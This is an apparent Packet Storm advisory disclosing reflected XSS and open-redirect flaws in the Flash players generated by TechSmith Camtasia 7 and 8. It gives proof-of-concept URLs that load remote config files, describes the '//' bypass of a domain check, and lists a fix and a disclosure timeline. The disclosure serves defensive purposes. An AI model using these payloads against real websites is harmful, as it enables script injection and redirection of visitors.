exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TechSmith Camtasia 7 / 8 Cross Site Scripting

TechSmith Camtasia 7 / 8 Cross Site Scripting
Posted Jan 14, 2015
Authored by Soroush Dalili

TechSmith Camtasia versions 7 and 8 suffer from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 0da3668d93c5d907fcfe6b8abc0ab9b5251abb5997b3d5d0d8042ce947378c29

TechSmith Camtasia 7 / 8 Cross Site Scripting

Change Mirror Download
Title: Reflected XSS in Flash files of TechSmith Camtasia 8 & 7
Author: Soroush Dalili (@irsdl)
Affected Software: TechSmith Camtasia v8.4.4 (latest 8.x) & v7.1.1 (latest
7.x)
Vendor URL: http://www.techsmith.com/camtasia-version-history.html
Vendor Status: vulnerable
CVE-ID: -

Camtasia 8 (v8.4.4 (latest 8.x) - vulnerable):
==============================================
TechSmith Camtasia is a screen recorder and video editor. After version 8,
it does not create SWF files that contain the video file. Instead, it
creates a MP4 file with HTML5 and SWF players.

However, SWF Player in version 8.4.3 (latest version at the time of
testing) was vulnerable to a reflected XSS attack.
After producing a Flash/HTML5 output, Camtasia creates the following flash
file:
ProjectName_controller.swf

This file is vulnerable to Open Redirect and XSS by loading a config file
that redirects the browser to an arbitrary destination after playing a
video. The destination URL can be attacker's URL (such as "//attacker.com/")
or a JavaScript that uses "javascript:" protocol.

The following shows a PoC code:
ProjectName_controller.swf?src=http://0me.me/demo/camtasia
/small.mp4&xmp=//0me.me/demo/camtasia/camtasia_v8.xml

This file can be found in any website that uses Camtasia projects for
instance techsmith.com website:
http://www.techsmith.com/includes/tsc_player.swf

Camtasia 7 (v7.1.1 (latest 7.x) - vulnerable):
==============================================
An XSS issue was resolved previously in generated Flash files of Camtasia 7
(http://web.appsec.ws/FlashExploitDatabase.php). TechSmith had patched this
vulnerability by implementing the "safeDomainCheck" function that checks
whether the domain is allowed or not in order to load the config file.
However, this protection can be bypassed by using "//" instead of "http://"
or "https://".

PoC code is as follows:
ProjectName_controller.swf?csConfigFile=//0me.me/demo/camtasia
/camtasia_v7.xml&.swf

Solution:
=========
Upgrade from Camtasia version 7 to 8. Use Camtasia HTML5 player instead of
the Flash player in Camtasia v8 and remove the old Flash files from
affected websites.

Disclosure Timeline:
====================
04-Nov-2014 – discovered
11-Nov-2014 – reported
14-Nov-2014 – initial acknowledge of receiving the issue from the vendor
17-Nov-2014 – the vendor confirmed that they know about these issues and
they do not have any ETA to patch the issue
18-Nov-2014 - the vendor confirmed that this issue can be publicly disclosed
07-Jan-2014 - the vendor also confirmed that this issue can be reported to
the security mail lists (double confirmation)!

Credit:
=======
Vulnerability found by Soroush Dalili (@irsdl)


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close